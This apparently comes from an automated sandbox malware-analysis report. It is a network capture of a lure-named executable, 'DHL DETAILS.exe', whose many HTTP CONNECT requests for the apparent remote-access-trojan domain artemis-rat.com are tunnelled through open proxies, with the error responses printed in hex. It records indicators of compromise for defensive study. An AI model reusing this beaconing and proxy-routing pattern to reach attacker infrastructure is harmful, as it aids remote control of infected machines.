                                                                                    Mar 9, 2024 13:14:20.149169922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1654192.168.2.554998185.212.60.62806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.149171114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.500693083 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:20 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1655192.168.2.555030172.93.213.177806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.149379969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.355993032 CET309INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.22.1
                                                                                    Date: Sat, 09 Mar 2024 12:14:20 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 157
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1656192.168.2.554965103.242.119.88806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.152000904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.560369015 CET629INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Date: Sat, 09 Mar 2024 12:14:20 GMT
                                                                                    Server: Apache
                                                                                    Proxy-Authenticate: Basic realm="Authorization"
                                                                                    Content-Length: 415
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 37 20 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 76 65 72 69 66 79 20 74 68 61 74 20 79 6f 75 0a 61 72 65 20 61 75 74 68 6f 72 69 7a 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 0a 72 65 71 75 65 73 74 65 64 2e 20 20 45 69 74 68 65 72 20 79 6f 75 20 73 75 70 70 6c 69 65 64 20 74 68 65 20 77 72 6f 6e 67 0a 63 72 65 64 65 6e 74 69 61 6c 73 20 28 65 2e 67 2e 2c 20 62 61 64 20 70 61 73 73 77 6f 72 64 29 2c 20 6f 72 20 79 6f 75 72 0a 62 72 6f 77 73 65 72 20 64 6f 65 73 6e 27 74 20 75 6e 64 65 72 73 74 61 6e 64 20 68 6f 77 20 74 6f 20 73 75 70 70 6c 79 0a 74 68 65 20 63 72 65 64 65 6e 74 69 61 6c 73 20 72 65 71 75 69 72 65 64 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>407 Proxy Authentication Required</title></head><body><h1>Proxy Authentication Required</h1><p>This server could not verify that youare authorized to access the documentrequested. Either you supplied the wrongcredentials (e.g., bad password), or yourbrowser doesn't understand how to supplythe credentials required.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1657192.168.2.555078172.67.181.103806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.161992073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.316072941 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:20 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1658192.168.2.555076104.18.44.93806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.162440062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.316595078 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:20 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1659192.168.2.55436739.99.144.43806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.169404984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1660192.168.2.550606213.136.78.200199256352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.177582026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1661192.168.2.55501564.137.93.6265196352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.191354990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.559606075 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                    Proxy-Connection: close
                                                                                    X-Webshare-Error: 407
                                                                                    X-Webshare-Reason: invalidpassword
                                                                                    Date: Sat, 09 Mar 2024 12:14:20 GMT
                                                                                    Content-Length: 121
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                    Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1662192.168.2.5549958.219.179.237156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.197237015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1663192.168.2.554971103.109.59.20910806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.197597980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1664192.168.2.55499965.109.152.8888886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.198738098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:24.719253063 CET270INHTTP/1.1 503 Service Unavailable
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Date: Sat, 09 Mar 2024 12:14:24 GMT
                                                                                    Content-Length: 102
                                                                                    Data Raw: 64 69 61 6c 20 74 63 70 3a 20 6c 6f 6f 6b 75 70 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 6f 6e 20 31 2e 31 2e 31 2e 31 3a 35 33 3a 20 72 65 61 64 20 75 64 70 20 31 30 2e 36 34 2e 32 33 38 2e 32 31 36 3a 34 37 30 30 36 2d 3e 31 2e 31 2e 31 2e 31 3a 35 33 3a 20 69 2f 6f 20 74 69 6d 65 6f 75 74 0a
                                                                                    Data Ascii: dial tcp: lookup artemis-rat.com on 1.1.1.1:53: read udp 10.64.238.216:47006->1.1.1.1:53: i/o timeout


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1665192.168.2.554994202.150.1.87806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.205468893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1666192.168.2.55505545.196.151.5954326352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.220046043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.441876888 CET308INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Server: FaaS v1.3-20220203-7fa38bd5af
                                                                                    Date: Sat, 09 Mar 2024 12:14:20 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Content-Length: 65
                                                                                    Proxy-Authenticate: Basic realm="Proxy"
                                                                                    Connection: close
                                                                                    Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64
                                                                                    Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1667192.168.2.55506424.199.86.18180006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.230654955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1668192.168.2.555117104.16.72.45806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.232134104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.386037111 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:20 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1669192.168.2.554993103.231.78.36806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.234841108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1670192.168.2.555170172.67.150.173806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.330647945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.500308037 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:20 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1671192.168.2.555194172.67.182.126806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.331340075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.500499964 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:20 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1672192.168.2.554022199.229.254.12941456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.331425905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1673192.168.2.555008181.209.78.789996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.332690001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.177074909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1674192.168.2.555209104.21.64.208806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.333300114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.500801086 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:20 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1675192.168.2.555210104.27.83.183806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.333322048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.501017094 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:20 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
